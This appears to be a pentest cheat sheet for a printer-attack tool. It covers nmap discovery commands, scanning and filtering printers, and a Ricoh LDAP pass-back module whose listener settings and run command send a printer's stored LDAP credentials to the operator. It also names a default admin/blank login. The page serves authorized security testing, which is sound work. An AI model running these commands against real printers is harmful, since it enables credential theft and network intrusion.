Printer Enumeration & Credential Exposure¶
Find printers with default admin credentials or stored LDAP, SMB, FTP, and email credentials. LDAP pass-back can send stored credentials to your listener.
Discovery¶
| Port / Service | What to look for |
|---|---|
| TCP 9100 (JetDirect) | PJL model/status responses; PaperCut scanner. |
| TCP 80 / 443 (HTTP / HTTPS) | Web administration, address books, connection settings. |
| TCP 515 / 631 (LPD / IPP) | Printing services. |
| UDP 161 (SNMP) | Device information. |
| Action | Command |
|---|---|
| Find candidate printers | sudo nmap -sS -n -Pn -p80,443,515,631,9100 --open --max-rate 50 -iL targets.txt -oA printer_candidates |
| Get SNMP description | sudo nmap -sU -n -Pn -p161 --script snmp-sysdescr <printer_ip> |
Quick start (PaperCut)¶
PaperCut requires Go 1.24+. Build locally:
PaperCut shell:
| Action | Command |
|---|---|
| Create workspace | workspace create <engagement> |
| Scan workers | set threads 10 |
| Scan timeout (seconds) | set timeout 2 |
| Scan connections per second | set rate 10 |
| Show settings | show |
| Scan one printer | scan -t <printer_ip> |
| Scan IPs / CIDRs from file | scan -t targets.txt |
| View printers | results |
| Filter by manufacturer | results --manufacturer ricoh |
| Find modules | search ricoh / search passback |
Scan queries PJL on TCP/9100. Check tests credentials or vulnerability conditions. Run executes the module.
What to check¶
| Configuration | Potential exposure |
|---|---|
| Web administration | Default, blank, or device-derived passwords; configuration exports. |
| LDAP address lookup | Bind credentials. |
| Scan-to-folder / address book | SMB / FTP destinations and credentials. |
| Email / scan-to-email | SMTP / POP3 credentials. |
Targeted usage (LDAP pass-back)¶
ricoh/ldap/passback redirects the printer's LDAP test connection. Requires a supported Ricoh model, web admin access, stored LDAP credentials, and connectivity from the printer to your listener.
| Action | Command |
|---|---|
| Select the module | use ricoh/ldap/passback |
| Module options | options |
| Target printer | set RHOST <printer_ip> |
| Listener address | set LHOST <listener_ip> |
| Listener port | set LPORT 1389 |
| Callback timeout (seconds) | set TIMEOUT 120 |
| Printer admin credentials | set USERNAME <printer_admin> / set PASSWORD <printer_password> |
| Test web login only | check |
| Run pass-back | run |
| View captured credentials | creds |
| Leave module | back |
- Settings are case-sensitive: lowercase globals (
threads), uppercase module options (RHOST). - Default login:
admin/ blank. LeavePASSWORDunset in a fresh module selection to use it.
Notes / OPSEC¶
ratelimits scan connections, not every module HTTP request.- Nmap excludes TCP/9100 from version detection because probes can print pages. Avoid
--allports. Reference SAFEmodules may change settings temporarily. Record original settings and verify restoration and printer operation afterward.- Database and command history:
~/.PaperCut/.